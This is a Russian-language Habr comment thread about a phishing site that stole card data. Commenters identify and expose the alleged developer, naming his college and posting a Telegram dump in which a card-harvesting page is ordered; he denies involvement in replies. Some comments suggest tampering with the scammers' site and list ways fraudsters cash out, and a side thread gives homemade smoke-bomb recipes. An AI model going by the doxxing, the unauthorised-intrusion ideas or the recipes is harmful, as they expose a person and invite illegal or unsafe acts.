        И добивает эту ситуацию тот факт, что прием оплаты зависит от мерчанта. Мерчант может его настроить так, что бы никаких лишних проверок не было и даже cvv не требовался. В таких случаях платеж намного легче вернуть, но некоторые мерчанты осознанно идут на такой риск в целях клиентоориентированности (не в целях мошенничества, т.к. штрафы там дикие при большом количестве возвратов, нет смысла).

        Как я понимаю, там есть куча способов снять деньги: перевод на счет сотового телефона, вывод через ставки или казино, покупка криптовалют итд.
        Угу. Или на авито что-нибудь купить с предоплатой. Мол я сейчас Вам денег на карту скину, а вечером заеду товар заберу. Вы такой радостный что у Вас товар купили, а завтра к Вам маски-шоу за полученный мошенничеством платеж на карту с изьятием компьютера и тыды.

        • S-trace
          /#20061866

          >А кто при оплате не просит?
          Ну так-то подавляющие все честные сайты работают через платёжных агрегаторов, поскольку сертифицировать себя для обработки ТАКИХ данных стоит 100500 нефтей.

          >Букинг, например, тоже просит ввести цвв у себя на сайте и мало того, данные карт передает отелям прямым текстом. habr.com/en/post/442378
          Скажите ещё, что вы пользуетесь этим сайтом для каких-то ещё целей, кроме поиска вариантов отелей?
          Мне вот почему-то куда больше доверия к цепочке «поискал на букинге=>нашёл отель=>нашёл сайт отеля=>забронировал номер на сайте отеля». Хотя бы по той простой причине, что в таком случае не будет проблем если синхронизация между букингом и отелем сломана/глючит/тормозит, и от этого букинг продаёт брони на уже заселённые в оффлайне на стойке регистрации номера.

          >ссл сертификата нет? Тоже не признак мошенничества.
          Но таки верный smell.
          Если владелец сайта даже в Let'sEncrypt сертификат себе не может — фтопку.

          >И добивает эту ситуацию тот факт, что прием оплаты зависит от мерчанта. Мерчант может его настроить так, что бы никаких лишних проверок не было и даже cvv не требовался.
          И таки да, и даже некоторые благотворительные организации таким не брезгуют (пальцем указывать не буду, но столкнулся).

    • dartraiden
      /#20054712 / +2

      А то, что Юрик размещал объявления о разработке и продаже фишигового сайта, это чистое совпадение. Если он сделал сайт, прекрасно понимая, что он делает и для кого, то претензии к нему есть и ещё какие.

      • 1c80
        /#20054740 / -3

        а как это доказать? он как я вижу совсем противоположенное пишет и сам сайт уже выключен и находится на украине, так что до него уже не добраться, потому возможно самое оптимальное для ТС, удалить статью и спрятать подальше следы своей работы, по выводу мошенника на чистую воду.

        • dartraiden
          /#20054766

          Выясним, кто создал чат, в который бот отсылает сообщения.

          Как видно создатель чата имеет такой же username как и сайт создателя — «gelloiss».
          Ну а создатель чата = @gelioss = Юрий, он в переписке не скрывает, что gelloiss.ru — его сайт, а на сайте всего его профили в соцсетях и мессенджерах…

          Альтернативная версия какая? Что кто-то был настолько дальновиден, что 4 года назал указал ник и скайп Юрия в объявлении о продаже фишингового сайта, затем создал телеграм-аккаунт с таким же именем и аватаркой, создал с этого аккаунта бота для приёма украденных данных, зарегистрировал ещё один сайт gelloiss.ru, накидал туда ссылок на профили Юрия и ждал годы, пока это вскроется, чтобы подставить Юрия?

          Вариант «кибермошенники зачастую умом не отличаются» намного вероятнее.

          • 1c80
            /#20054826

            все может быть, даже и такое, а может купил шаблон 4 года назад и до сих пор клепает на нем сайты сливая все на один чат, Вы серьезно думаете, что там всего один сайт в работе?

          • MacIn
            /#20061820

            Ну а создатель чата = @gelioss = Юрий

            Допустим, это identity theft?

            Альтернативная версия какая?

            А «основная» какая — что человек настолько туп, что наследил где только можно, пользуется одним и тем же аккаунтом для личных дел и грязной работы?

        • 1c80
          /#20055358

          Это к безопасности ТС относился комментарий, а не тому что бы скрыть следы деятельности этих людей, думаю тут вообще партнёрка, эти сайты уже много лет существуют мне сказали и их много разных, сауны, номера. Область поиска клиентов это сайты СЗ в основном.

  5. 1c80
    /#20054714 / +2

    Если докажут, то да.
    А если поленятся, или окажется, что Юра не при чем, то может попасть и ТС.

  6. dartraiden
    /#20054718 / +6

    для романтичного свидания со своей возлюбленной
    А вы её хорошо знаете?
    Просто это популярная схема развода: девушка знакомится в сети с молодым человеком, убалтывает его пойти в кино и скидывает ссылку на сайт кинотеатра, ну а дальше — ни денег, ни девушки (конечно, на том конце никакая не девушка, а всё тот же мошенник).

    • Valeratal
      /#20054812 / +1

      Плюс 1. Тоже слышал о таком разводе

  7. lubezniy
    /#20054816 / +4

    Если не рассматривать вариант обращений в правоохранительные органы или банки, есть вариант расшатать систему сбора денег изнутри — например, добавив на сайт подмену пары произвольных цифр в cvc/cvv на случайные (разумеется, в логи и далее «клиенту» должны выдаваться подменённые данные). Тут уже и банки, и клиенты сами прочухают неладное, а кардеры могут заподозрить «вебмастера» в «измене» и разобраться с ним своими методами. Можно ещё регистратору домена отправить жалобу на владельца домена, чтобы тот его забанил и запретил другие домены регить, хоть это может оказаться неэффективно.

    • JerleShannara
      /#20055014

      У половины таких сайтов «платежные шлюзы» смешные и никакой проверки вводимых данных не осуществляют, ну а дальнейшее сугубо на совести того, кто что в этот шлюз вобьёт.

      • lubezniy
        /#20055104

        Подавать случайную инфу — это первое, что приходит в голову. Но атака с передачей всех случайных данных не позволит банкам предупредить клиентов о подозрительных транзакциях по карте. А так, когда номер карты будет реальным, а cvv нет, банки-эмитенты быстро увидят, что что-то не так, и заодно начнут копать сами — не через правоохранительные органы, так через международные платёжные системы.

    • submagic
      /#20056294

      Я бы в подобном случае поступил бы именно так. У меня был похожий случай несколько лет назад — и я, так сказать, кое-что подправил мошенникам в их системе. Не знаю, что с ними там стало дальше, но через несколько месяцев их ресурсы и аккаунты перестали функционировать.

  8. Sabubu
    /#20054830 / +2

    Вообще, если тут есть граждане Украины, которые не боятся написать заявление в органы, то вполне можно его написать, в стиле «В сети Интернет на сайте… в статье »..." я прочел о возможных признаках преступления — кражи данных банковских карт. Прошу проверить, имело ли место нарушение закона". Написать, конечно, можно и в российские органы, но боюсь, что заграничные коллеги могут потребовать сначала что-нибудь вернуть что-нибудь отжатое в обмен на преследование преступника.

    Можно вбросить ссылку на статью в группу университета Вконтакте — пусть подписчики узнают о «талантливом» одногруппнике. Как плюс, теперь ники и логины товарища хорошо гуглятся.

    Ну и отдельно, конечно, поражает то, что все это вообще возможно. Вроде везде проверка паспортов, даже если ты копейки на центы поменять хочешь, к вай-фаю без номера телефона не подсоединиться, а мошенники спокойно заводят какие-то подставные счета, выводят через них деньги и остаются безнаказанными. Как так? Видимо, пока они не финансируют антиправительственные митинги, особого интереса они не вызывают.

    Как я понимаю, там есть куча способов снять деньги: перевод на счет сотового телефона, вывод через ставки или казино, покупка криптовалют итд.

    • Ostrouschcko
      /#20055204 / +1

      Собираюсь это сделать, отпишу про результат обращения

    • wxmaper
      /#20055442

      Ну и отдельно, конечно, поражает то, что все это вообще возможно.

      Что вы… Сложно представить сколько существует интернет-магазинов, которые продают "ничего" за огромные суммы, а платежи проводят через Яндекс.Деньги. Сам однажды попался на такой в предновогодней суете. Купил "ничего" под видом видеокарты. Неладное почуял довольно быстро, спустя 2 дня, когда чисто случайно решил посмотреть сертификат сайта, а он оказывается был выдан накануне. И главное как грамотно всё было спланировано: абсолютно не вызывающий подозрений домен, ssl-сертификат, огромное количество товаров, личный кабинет с историей заказов, техническая поддержка, платежная система яндекса.
      Когда я понял, что я — лох, сразу сообщил в яндекс о мошеннической схеме через их платежку со всеми собранными сведениями: о том, что магазин не существует физически, а по указанному адресу расположен совершенно другой магазин; о том, что приложенные свидетельства и документы на сайте вообще не относятся к деятельности магазина, а принадлежат другим юридическим лицам/фирмам.


      Ответ яндекса не заставил ждать, он был в духе: "Да, мы видим ваш платёж, но вернуть деньги не можем, т.к. они уже потрачены на приобретение других услуг Яндекса.". После моего обращения в Яндекс, сайт с их платежкой проработал еще несколько недель, а счет мошенников даже не был заблокирован и они преспокойно продолжали принимать платежи (да, я проверял форму ввода данных о карте, она работала). И сколько человек еще было обокрадено, прежде чем счет был заблокирован? Никто этого не узнает.

      • submagic
        /#20056336

        Жаловаться хостеру и регистратору домена. Возможно, в РосКомНадзор. Заявление в полицию. Все должны знать, куда (кроме них) ещё ушла жалоба. Но это дело хлопотное. Заявление в полицию — это, скорее всего, ещё как минимум пара вызовов для дачи показаний. Нужно быть готовым «дожимать» ситуацию, тратить на это ресурсы.

        Вообще же ХОРОШО сделанные клоны магазинов встречаются часто, да. Не знаю, как сейчас — но раньше даже давали ссылку на раздел настоящего магазина в Яндекс.Маркете (типа, смотрите, у нас пять звёзд, ага). Тогда, несколько лет назад, несовпадение доменных имён на основании информации из раздела было неочевидно (да и сейчас можно взять визуально очень похожее).

        • wxmaper
          /#20056542

          Я в тот день написал жалобу везде где можно: яндексу, регистратору домена, в РПН, в прокуратуру, в какой-то отдел it-преступлений (точного названия не помню). На счет хостера не помню, скорее всего я на него не вышел.


          Заявление в полицию — это, скорее всего, ещё как минимум пара вызовов для дачи показаний

          Именно так и было. Меня даже попросили принести 2ндфл, а когда следователь (девушка) увидела зарплату за последний месяц, округлила глаза: "И вы жалуетесь на кражу 10 тысяч рублей?". Реакция меня прям в шок повергла. Т.е. если я когда-то получал нормальную зарплату, то жаловаться на преступников, обобравших меня — это прямо как-то низко с моей стороны.

          • submagic
            /#20056590

            Т.е. если я когда-то получал нормальную зарплату, то жаловаться на преступников, обобравших меня — это прямо как-то низко с моей стороны.
            Просто для них чем больше заявлений — тем больше работы (а если случай непростой, то и конечная статистика ухудшается). При этом их оплата от объёма работы зависит не слишком сильно. Поэтому они к заявителям так и относятся. Но, конечно, Вы всё правильно сделали. Чем больше жалоб — тем больше вероятность того, что преступниками займутся быстрее и основательней (и они меньшему количеству добропорядочных граждан успеют нагадить).

            Отечественных хостеров неплохо определяет известный 2ip.ru/guess-hosting

            • wxmaper
              /#20056714 / +2

              их оплата от объёма работы зависит не слишком сильно

              В этом-то и проблема! Ответственность за финансовые преступления должна лежать на тех, кто получает зарплату за то, чтобы эти преступления не совершались.
              Не смогли пресечь преступление? Виновны.
              Не смогли устранить последствия (найти виновников и вернуть украденное) — виновны дважды.
              А то как получается: люди платят налоги, чтобы обеспечить работу всех этих ведомств, созданных защищать нас, а они работу свою не выполняют и зарплату получают исправно и в полном объёме.


              больше вероятность того, что преступниками займутся быстрее

              Самый первый и ответственный шаг должны были сделать сотрудники безопасности Яндекса, они, когда согласились с тем, что имеются признаки мошенничества, могли приостановить транзакции, но этого не было сделано.


              Вообще вся эта система дырявая. Как пример — телефонные мошенники со своими смс-ками "вам зачислено 100 рублей". Когда сообщаешь оператору о мошенничестве, они просто блокируют номер. Всё. Дальше никто ничего не делает.


              Почему операторы не инициируют процесс поимки преступника? Ведь мошенник использовал их сервисы. Им проще всего: они уже знают на кого зарегистрирована сим-карта (могут и не знать, да), они могут отследить где примерно карта была активирована, когда была активирована, где была активность этой карты. Могут отследить трафик, проанализировать записи разговоров, посмотреть на какие счета переводились деньги и т.д. и т.п. Во всяком случае они могут не делать всего этого сами, они могут просто передать архив данных в соответствующие органы, но вместо этого они говорят: "Вы можете самостоятельно написать заявление в прокуратуру для возбуждения дела". Но по факту я не являюсь жертвой, ведь я не передал деньги преступнику. С чем я должен обращаться в органы? С тем что меня пытались обмануть, но ничего не вышло. Ну не вышло и не вышло, такое дело даже рассматривать не станут.
              Жертва тут — оператор, чьими услугами воспользовались, чтобы осуществлять незаконную деятельность. Но им пофиг, с них не убудет, они свой процентик за переводы получают и ладно. Так быть не должно.
              С Яндексом аналогично, только они даже не посчитали нужным вовремя заблокировать счет.

        • McDermott
          /#20058528

          Хостер и регистратор (по крайней мере, reg.ru) будут блокировать сайт только в результате обращения из полиции (из личного опыта).

      • lubezniy
        /#20056448

        Ну, SSL-сертификат сейчас, в эпоху Let's Encrypt, не сказать чтобы является критерием подозрительности (если, конечно, он был выдан их CA): перевыпускаются они в штатном режиме достаточно часто. А вот документы магазина проверять не мешает.

        • wxmaper
          /#20056564

          Я не сильно разбираюсь в этом, но вроде это был не Let's Encrypt.

      • VSOP_juDGe
        /#20059862 / +2

        Меня яндекс также послал (в полицию), когда мне продали левый ключ от игры, однако удалось вернуть деньги через мой банк (Тинькофф). С тех пор предпочитаю не покупать в онлайн-магазинах, которые принимают оплату через яндекс деньги.

    • empy26
      /#20056054

      На сайте киберполиции Украины создал обращение о возможном правонарушении со ссылкой на статью. Сомневаюсь конечно что от этого будет какой то толк, но все же.

  9. coderisimo
    /#20054932

    … данные банковской карты предлагалось ввести на не защищенной странице этого же домена.

    А что мешает злоумышленникам прицепить https и «принимать платежи» на «безопасной странице»? )

    • dmitrmax
      /#20054990 / +1

      Жадность и лень, видимо)

      • sumanai
        /#20055446

        Жадность поставить бесплатный сертификат?

        • dmitrmax
          /#20055480

          Жадность купить платный. Лень разобраться с let's encrypt.

          • mafia8
            /#20055780

            Включил let's encrypt в панели управления Direct admin.

    • JerleShannara
      /#20055018

      А есть и такие клованы, только сам шлюз у них смешной слишком.

  10. Zmiy666
    /#20054972 / +2

    Сейчас кредитную карту вообще опасно доставать. Чисто случайно нашел в открытом доступе архив видео с камер наблюдений мелкого супермаркета… 3 камеры стояли над кассами и снимали их крупным планом — разрешения камер хватало, чтоб прекрасно видеть номер карты, которой оплачивают покупки а так же имя и прочие данные. И некоторые покупатели крутили ей, когда вставляли в ридер. Так что код тоже прекрасно был видим. Конечно процент таких покупателей весьма невелик — многие платили наличкой, но из любопытства я смог выцепить на видео 4 карты со всеми данными, отсмотрев примерно 3 часа с промотками… Поскольку такие камеры есть везде, почти в любом магазине — это мягко говоря напрягает… хрен его знает, где потом это видео всплывет, ведь оно обычно никак не защищено. Это песец, товарищи ((
    А в интернете если где-то плачу — предпочитаю использовать одноразовые виртуальные кредитки.

    • ClearAirTurbulence
      /#20055002

      «крутили ей, когда вставляли в ридер. Так что код тоже прекрасно был видим»

      Берется пломбировочная наклейка, наклеивается на код, если просвечивает — дополнительно уже на ней маркером закрашивается место.

      Можете даже официанту ее после этого отдать (хотя сейчас уже практически неактуально, они обычно с терминалом приходят), сразу будет видна попытка отклеить, если она, конечно, будет предприниматься.

      • xirahai
        /#20055282

        Я например с момента получения карты, сразу соскреб CVC код и нарисовал вместо него другие цифры.

      • qwertyqwerty
        /#20056576

        Прошитому терминалу похрен. Дамп есть.

        • Speakus
          /#20056652

          Дамп есть если только платить магнитной полосой. А её можно и размагнитить.

          • vladkorotnev
            /#20057698

            Чтобы потом приехать в какую-нибудь страну типа Японии и остаться без возможности платить карточкой совсем :-)

            • mkll
              /#20060804 / +1

              Если у вас одна-единственная карта на все случаи жизни, то это, мягко говоря, непредусмотрительно.

  11. dmitrmax
    /#20054988 / +3

    Резюме: какер погорел на том, что не настроил let's encrypt на фишинговом сайте )))


    Но автору все равно респект. Прочитал с большим удовольствием )

  12. shalm
    /#20055142

    Статья интересная, идти в органы не стоит, они сами должны такие статьи на популярных ресурсах находить и изучать и добытую информацию и как надо работать

  13. Elmot
    /#20055298

    А вот интересно, можно им туда honeypot карточек в базу напихать?

  14. rpiontik
    /#20055380

    Нормальное, такое, романтическое свидание вышло. Девушка осталась довольна? :)

    • dmitrmax
      /#20055490 / +3

      Как в известном анекдоте:


      • Давай трахаться?
      • Забей, смотри лучше какого я хакера поймал )))

  15. Nine_Red
    /#20055454

    Вот так обострённое чувство справедливости и человеческая порядочность привели человека на путь white hat. Надеюсь, что «Продолжение следует», как нам сообщил автор.

    • pyrk2142
      /#20056194

      С таким White Hat может быть очень грустное продолжение (достаточно маловероятное, но реальное): если данные этих карт будут использованы для мошенничества или кражи денег (что особенно неприятно), то влететь может автору: он имел доступ к этим данным, повзаимодействал с ними, сохранил их, плюс искать его может быть проще, чем создателей сайта.

  16. Incomer
    /#20055456

    Я так понял, что это украинцы безобразничают?

  17. Soniclev
    /#20055458

    Юра уже удалил страницу ВКонтакте

    • dmitrmax
      /#20055494

      Штирлитц еще никогда не был так близко к провалу!

    • Gelloiss
      /#20055500 / +1

      еще вчера, через пару часов после публикации этой статьи. Слишком много гневных смс поступило)

  18. fukkit2
    /#20055460

    Мда, автор…
    Улов у тебя — ерши сопливые.
    Методы твои — незаконные.
    Статейку лучше удали, от греха.

    • fukkit2
      /#20057336

      Кулхацкеры и неуловимые аноны негодуют. Однако, дружеский совет остается в силе.

  19. Gelloiss
    /#20055462

    Статья классная и проделана реально хорошая работа, мне нравится)
    Но есть один нюанс. Я не создатель и даже не участник этой группы.
    Ко мне поступил заказ на zismo.biz, довольно давно, кстати и я его просто выполнил.
    Сам заказ был в том, чтобы перенести их сайт с тильды на «свой хостинг» и написать простую админку для публикации фильмов и тп. Никаких карт не было, оплата у них была через яндекс, так что я и не знал, что они мошенники. Бот использовался для оповещений о новых заказах, поставил со своего аккаунта, ибо так было проще.
    Все мои переписки с ними сохранились и в случае чего я смогу их показать.
    Просто видимо сайт переделали. К тому же, там ссылка на меня была не только в админке, но и на главной. Если тс ее не увидел, то мб и ее убрали.

    Если есть какие-то вопросы — пишите, отвечу)

    • misery-hacker
      /#20055470

      Принадлежит ли сайт gelloiss.ru Вам?

      • Gelloiss
        /#20055486

        Да. Можете перейти на сайт из поста, для удостоверения в этом)
        (Именно с поста, вручную вводить в строку не выйдет)

        • misery-hacker
          /#20055496

          Принадлежит ли telegram аккаунт gelloiss Вам в настоящее время?

          • Gelloiss
            /#20055564

            У Вас же это в статье есть. Я просто говорю, что не связан с заказчиками никак кроме «выполнил, установил все и настроил, отдал сайт». Иногда фиксил баги поначалу. Да и я не знал, для каких конкретно целей сайт будет использоваться.
            Обвинять меня в краже персональных данных неправильно.

            • misery-hacker
              /#20055592

              Обвинять меня в краже персональных данных неправильно.

              Это еще предстоит выяснить.
              Если я правильно Вас понял, то Вы утверждаете, что получали ФИО, номера телефонов, номера банковских карт в свой телеграмм, но не знали для каких целей они используются?

              • Gelloiss
                /#20055598

                Лично я не получал ничего. Бот, созданный от моего аккаунта, мог отправлять что угодно и кому угодно, т.к. токен был не у одного заказчика.
                Сейчас токен сменен и никто ничего от него отправлять больше не будет.

                • Space__Elf
                  /#20056566

                  Лично я не получал ничего. Бот, созданный от моего аккаунта, мог отправлять что угодно и кому угодно, т.к. токен был не у одного заказчика.

                  Хорошо — я вам верю.
                  Сможете ли убедить автора статьи?

                  • Gelloiss
                    /#20056678

                    А надо ли? Здесь лучше убедить кого-то другого, т.к. автор статьи явно нарушил несколько статей. Как минимум: pravo.rg.ru/rubrics/question/3446

                    Если мне надо будет кого-то убедить в своей невиновности, то это точно будет не ТС. Ну и если надо будет, то сделаю) У меня все переписки сохранены с заказчиками. Доступов и сохраненных карт или чего-то подобного тоже нет, так что проблем пока не вижу.

                    • S-trace
                      /#20062018

                      >У меня все переписки сохранены с заказчиками.
                      А вы сможете неоспоримо доказать при необходимости (не будем обсуждать при какой именно), что все эти сохранённые переписки действительно имели место в реальности?

            • misery-hacker
              /#20056102 / +1

              Да и я не знал, для каких конкретно целей сайт будет использоваться.

              Я бы поверил, если бы не диалог в telegram. Уверен, вы прекрасно знали для каких целей используется созданный Вами сайт.
              Извините за вид, сохранился только дамп:
              dump
              Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message='Короче нужен сайт по «переводу карты на карту без комиссии» естесственно он должен высылать данные карты и код подтверждения мне', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

              Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\nТипа этого?)) \nДанные в телегу приходят', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ? это платежная система для тех, кто зарабатывает в интернете. Электронный кошелек, прием платежей и вывод денег, денежные переводы. Мгновенная регистрация, выгодные комиссии.', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | Электронный кошелек, платежи, прием и вывод денежных средств', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

              • Gelloiss
                /#20056592 / +2

                Не знал.
                Со слов заказчика moneyonline, сайт использовался для перепродажи товаров. Т.е. у него заказывали банк. карты, он получал оплату и заказывал дешевле в других местах.
                Также и Вы при заказе не уточняли с какой целью Вам нужен сайт. Это не единичный случай, когда люди просят написать какую-то подобную платежку, потому что не могут или не выгодно связываться с официальными, при этом они никого «не кидают на деньги».

                В статье Вы обвиняете меня в том, что я лично собирал данные карт, снимал с них деньги и т.д. Но нет, я лишь написал сайт на заказ и все. Вы не нашли никаких реальных мошенников, и даже то, что Вы вышли на меня не позволит найти их, ведь все, что у меня есть — аккаунты телеграмма, два из которых уже удалены.

                Вы же не станете обвинять фирму, создавшую интернет магазин, который отправляет, например, подделку? Нет, ведь фирма к этому никакого отношения не имеет.
                Также и у меня. При том, после статьи, я сразу отключил бота и он больше не сможет отправлять заказчикам данные, потому что я не хочу быть замешан в этом.

                • walkman7
                  /#20056642 / -1

                  Юрий Андреевич, так ты даже в своем колледже (ХПКК група П-51) внаглую обманываешь преподавателя и сам же это постишь pikabu.ru/story/kak_otvetit_prepodu_ne_vyigovarivaya_ni_zvuka_6639791 или это не ты? Или же ты думаешь что Панченко будет вместо тебя будет отвечать и дальше?

                  Со слов заказчика говоришь, как то очень быстро «твой» заказчик подчистил сайт…

                  • Gelloiss
                    /#20056654 / +2

                    Лол, давайте сюда еще забавную ситуацию приплетем с колледжа?)))
                    А Вы никогда не говорили преподавателю, что заболели или проспали, когда на самом деле просто было лень идти? И что, Вы теперь тоже обманщик и будущий преступник? Кстати, это не Кривошеев…

                    Я отключил бота и заказчик заинтересовался этим, прочел статью. Причину отключения сайта не знаю. Могу предположить, что на него обрушилось большое количество гневных писем.

                • lubezniy
                  /#20056740

                  PCI DSS? Законодательство (украинское тоже) по противодействию отмыванию денег? Как в этих условиях в принципе что-то обналичивать? Неа, не слышал и не думал…

                  • Gelloiss
                    /#20056744

                    Этот вопрос адресован мне? Если да, то, извини, не понял вопроса.

                • Ghool
                  /#20057086

                  Парой комментов выше была оплата по яндексу, теперь отправка платёжных данных в телегу

                  Для каких вообще легальных действий может понадобиться отправка платёжных данных клиента в телегу?

                  • Gelloiss
                    /#20057128

                    Здесь речь шла о двух разных сайтах.
                    И я же описал для каких. Ну так мне говорили. Я сильно не расспрашивал. Есть работа, делаю.
                    Исключения были, когда заранее 100% понимаю, что черная тема.

                  • edogs
                    /#20057196 / -2

                    Для каких вообще легальных действий может понадобиться отправка платёжных данных клиента в телегу?
                    А что именно Вас тут удивляет?
                    То что данные уходят в 3rd-party контору? Так это достаточно частая практика, у нас заказы бывают и в скайп посылать и по смс и даже просто в личку на другой форум. Не очень безопасно, но никак не уголовно.
                    То что данные уходят в открытом виде и полностью, а не перекидывает на оплату на сайт банка сразу? Это тоже частая ситуация, когда процессинг наполовину ручной. Те же агрегаторы продажи авиабилетов или букинг (мы где-то писали выше), они в момент непосредственной покупки у поставщика вводят эти клиентские данные и они им нужны полностью у себя что бы их ввести. Опять же, не очень безопасно, но вряд ли уголовно.

                    Понимаете в чем штука. Проблема со всеми мошенниками в том, что для своей эффективной деятельности они максимально маскируются под честные методы ведения бизнеса. Поэтому в подавляющем большинстве случаев, если мошенник не идиот, 99% его действий объясняется в рамках сложившейся деловой практики, пусть даже она несколько сомнительна в плане безопасности и белости.

                    • Ghool
                      /#20058078

                      Вы так и не ответили, зачем это нужно.
                      Если нужно просто хранить данные карты клиента, что бы ему было удобнее — тогда должен быть вопрос, нужно ли сохранять карту


                      и при этом не нужно хранить (знаю, что это не панацея, но всё же)

                      • S-trace
                        /#20062052 / +1

                        Международные платёжные системы очень жёстко регулируют, какие данные и какие их клиенты (зависит от уровня сертификации клиента) могут сохранять. И сохранение ВСЕХ данных карты в открытом виде стоит нереально дорого, и поэтому не применяется честными сайтами (практически все честные сайты пользуются сертифицированными крупными платёжными агрегаторами)

                    • mishast
                      /#20059100 / +1

                      Для хранения данных карты нужна сертификация PCI DSS, просто так по желанию левой ноги это не делается.

                      • Areso
                        /#20059726 / +2

                        Booking.com с отельерами тоже об этом знают, или нет?

                  • Vilgelm
                    /#20060972

                    Для каких вообще легальных действий может понадобиться отправка платёжных данных клиента в телегу?


                    В принципе можно придумать такие схемы. Например, дропшиппинг, если дропшиппер очень хочет сэкономить (типа получает заказ, потом с карты клиента на его адрес покупает на Aliexpress). Но что-то я сомневаюсь, что это распространенный сценарий.

                    • Ghool
                      /#20060984 / +1

                      … если дропшиппер очень хочет сэкономить, получает заказ и данные кредитки, и потом просто снимает с неё деньги

                      • Vilgelm
                        /#20061064

                        100% экономия. Но я о том, что можно придумать легальные способы использования данных подобным образом. Они маловероятны, но придумать можно.

                        • Ghool
                          /#20061072

                          Ага.
                          Но можно уже не придумывать, в соседней ветке выложили скрины, где объект исследования прямо предлагает фишинговые сайты на продажу

    • dmitrmax
      /#20055514 / -2

      А чё теперь на хабре коменты писать может любой, кто просто зарегается?

      • nidalee
        /#20055582

        Да.

        • dmitrmax
          /#20055702

          Видимо и минусить теперь тоже могут, раз за такой вопрос уже минусят )

          При Билли Гейтсе такого не было!

          • Gelloiss
            /#20055712

            Нет, не могут.
            А комменты лишь после модерации появляются.

            • nidalee
              /#20055826

              Писать-то могут. Публикует либо автор, либо (вроде как) модератор. Раньше вы бы при желании ничего не написали, и никто бы волшебную кнопку не нажал.

              • Gelloiss
                /#20055836

                Какую кнопку?

                • nidalee
                  /#20055862

                  Которая опубликует ваш комментарий для широкой публики, не только автора поста и администрации.

    • progman_rus
      /#20055792 / +1

      image
      А это марсиане продавали фишинговый сайт от вашего имени?

      PS просто из любопытства — сон нормальный? Не страшно по улице ходить?

      • Gelloiss
        /#20055804 / -1

        Посмотрите на дату. Посмотрите на мой последний визит и вообще время проведенное на том форуме.
        Честно, я до этого поста и забыл об этом. На идею меня толкнул одноклассник (Да, я тогда еще был классе в 8), типа пошутить над другом. Потом решил попробовать вдруг получится продать, может кому надо))
        Было продано 0 копий, ни один аккаунт не пострадал.

        • progman_rus
          /#20056216

          Ничего себе шуточки… лет на семь строгого режима.

          Мы в восьмом классе по другому шутили. Карбид в лужу, дымовушку из селитры в женский туалет в школе кинуть.

          • apanasenko
            /#20058058 / -2

            Ничего себе шуточки… лет на семь строгого режима или сколько там за изготовление взрывчатых веществ?

            • progman_rus
              /#20058202 / +1

              эх молодо зелено… пищевая сода + аммиачная ( можно и натриевая, но она хуже дымит ) селитра + горячая вода. Замачивать газету в этом растворе, потом сушить на батареи. Потом свернуть в плотную трубочку и обмотать фольгой.
              это не ВВ, просто дымит прикольно.
              А в моем детстве селитра свободно продавалась в промтоварах для огородников.

              • tvr
                /#20058700 / +1

                эх молодо зелено

                Гидроперит+фиксаж = много дыма.

                • submagic
                  /#20058948

                  А разве фиксаж всё ещё продаётся?
                  Давайте уж по-взрослому:
                  coollib.net/b/212132/read

                  • Meklon
                    /#20060566 / +1

                    Замени на анальгин) Из той же аптеки) Воняет жутко только.

                    • S-trace
                      /#20062092

                      В этом то и прикол)
                      А реакция начинается после пары-тройки минут на батарее (или в любом другом тёплом месте))

                      • MacIn
                        /#20065964

                        Или минут 15 просто при комнатной температуре :D Эх, школа…

                • progman_rus
                  /#20059282

                  Магазин фототоваров был на другом конце города. А промтовары в 10 минутах.
                  Еще ближе был магазин музыкальных товаров где продавались гитарные медиаторы 2 штуки за копейку. Мы их мелко резали и в бумажку, если поджечь то тоже много дыма.

                  • tvr
                    /#20059294

                    Мы их мелко резали и в бумажку, если поджечь то тоже много дыма.

                    А если в фольгу то и ещё летающего по непредсказуемой траектории.

                    • somatiq
                      /#20059808 / +3

                      А если в обёртке из фольги сделать хвостик для выхода дыма\газов, то даже и по достаточно предсказуемой.

              • apanasenko
                /#20062494

                сарказм не прошел :(

                Но вообщем у каждого поколения свою «шуточки» на грани фола и не понятны предыдущему.

    • alsoijw
      /#20056688

      Сам заказ был в том, чтобы перенести их сайт с тильды на «свой хостинг» и написать простую админку для публикации фильмов и тп.

      Почему опровдания о незаконности есть, а извенений за дыры в коде нет? ?(???)?
      Непростительно ((+???))

      Профиль скрыт из любви к искусству, или знаком с другим деаноном?

      • Gelloiss
        /#20056696

        Не до извинений было, сори.
        Господи, вопрос про профиль, это вообще что-то забавное. Вам по кайфу все искать обо мне?))
        Профиль скрыт, ибо это по дефолту, походу. Ну точно не специально. И вообще я шиккикомори пользовался месяца два максимум, ибо неудобно мне каждый раз помечать какие-то анимешки… Не вижу в этом смысла. Смотрю и смотрю)

        • alsoijw
          /#20056762

          Неужели в «Харьковском патентно-компьютерный колледже» ничего про защиту от взлома не говорили?

          • Gelloiss
            /#20057000 / -1

            У нас очень хороший колледж, где преподают лишь современную информацию.
            Зачем учить защите в пхп, если можно установить вп, где все уже защитили за тебя?

            • alsoijw
              /#20057052 / +2

              если можно установить вп
              вп — это WordPress?

              Чем вам так преподаватели насолили, что вы им тут такую антирекламу делаете? Уже б сказали что прогуливали занятия…

            • Rsa97
              /#20057054 / +2

              Вы таки хотели сказать «где все дыры сделали за тебя»?
              На WordPress приходится около 75% взломов всех CMS.

              • jok40
                /#20058280

                У Вас есть опыт взлома WP через его «дыры»?

              • Vilgelm
                /#20060992 / +1

                Справедливости ради скорее всего это из-за его популярности. Там теперь автообновления безопасности есть, так что все не так уж и плохо.

            • Cheater
              /#20058896 / +5

              На ваш коммент хочется повесить золотую табличку «Весь уровень подобных учебных заведений в двух фразах».

